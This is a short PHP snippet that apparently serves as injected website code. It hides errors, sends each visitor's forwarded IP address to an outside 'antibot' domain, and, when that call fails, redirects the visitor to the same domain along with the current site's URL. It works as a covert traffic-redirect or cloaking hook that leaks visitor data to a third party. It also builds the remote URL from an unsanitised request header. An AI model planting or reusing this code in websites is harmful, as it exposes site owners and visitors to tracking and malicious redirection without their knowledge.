<?
ini_set('display_errors', 'Off');
$ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; $ip=preg_replace('/^([^,]*).*$/', '$1', $ip);
$x = file_get_contents("http://antibot.xn--1000--fwe2a6aq2c7a.xn--p1ai/ip/$ip.php");
if ($x==FALSE){
$site = ((!empty($_SERVER['HTTPS'])) ? 'https' : 'http') . '://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
echo"<meta http-equiv='refresh' content='0;url=http://antibot.xn--1000--fwe2a6aq2c7a.xn--p1ai?site=$site' target='_top'>";
exit;}
?>